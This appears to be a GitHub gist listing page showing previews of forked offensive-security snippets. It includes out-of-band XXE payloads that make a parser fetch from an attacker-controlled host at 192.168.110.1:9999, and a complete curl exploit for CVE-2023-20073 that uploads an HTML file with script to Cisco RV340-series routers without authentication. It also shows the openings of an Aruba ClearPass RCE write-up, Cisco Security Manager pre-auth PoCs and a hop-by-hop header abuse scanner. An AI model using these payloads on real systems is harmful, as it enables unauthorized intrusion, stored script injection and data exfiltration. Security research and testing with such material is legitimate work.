Pear1y Pear1y

  • Cyber Security
  • Bermuda
Pear1y / XXE_payloads
Last active February 22, 2024 03:58 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
OOB XXE(Verified)
--------------------------------------------------------------
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxx SYSTEM "http://192.168.110.1:9999/x"> %xxx;]>
<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY % xxx SYSTEM "http://192.168.110.1:9999/x"> %xxx;]><r></r>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
Pear1y / CVE-2023-20073.sh
Created August 20, 2023 06:03 — forked from win3zz/CVE-2023-20073.sh
Unauthenticated Arbitrary File Upload and Stored XSS in Cisco RV340, RV340W, RV345, RV345P VPN Routers (CVE-2023-20073)
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
Pear1y / CVE-2020-7115.md
Created November 8, 2022 08:01 — forked from Retr02332/CVE-2020-7115.md
Understanding CVE-2020-7115 in detail

CVE-2020-7115 (Aruba Clearpass RCE)

Reconnaissance

When we select a domain as a target and fingerprinting shows that the web application runs Java on the backend, it is worth looking for files such as struts.xml to further enlarge the attack surface.

Struts is a web framework (MVC) oriented toward Java technologies. This file defines some of the site's configuration. Among its settings there is one in particular that can be very useful to an attacker: the <action> element.

What is a struts.xml file?

It is an XML configuration file that specifies the relationship between a URL, a Java class and a view page (such as index.jsp).

Pear1y / CSM_pocs.md
Created September 27, 2022 10:18 — forked from Frycos/CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently, from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, and security advisories were not published. All payloads are processed in the context of NT AUTHORITY\SYSTEM.

//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Field;
import java.util.HashSet;
import java.util.Scanner;
public class a {
Pear1y / hbh-header-abuse-test.py
Created May 16, 2022 08:53 — forked from ndavison/hbh-header-abuse-test.py
Attempts to find hop-by-hop header abuse potential against the provided URL.
# github.com/ndavison
import requests
import random
import string
from argparse import ArgumentParser
parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.")
parser.add_argument("-u", "--url", help="URL to target (without query string)")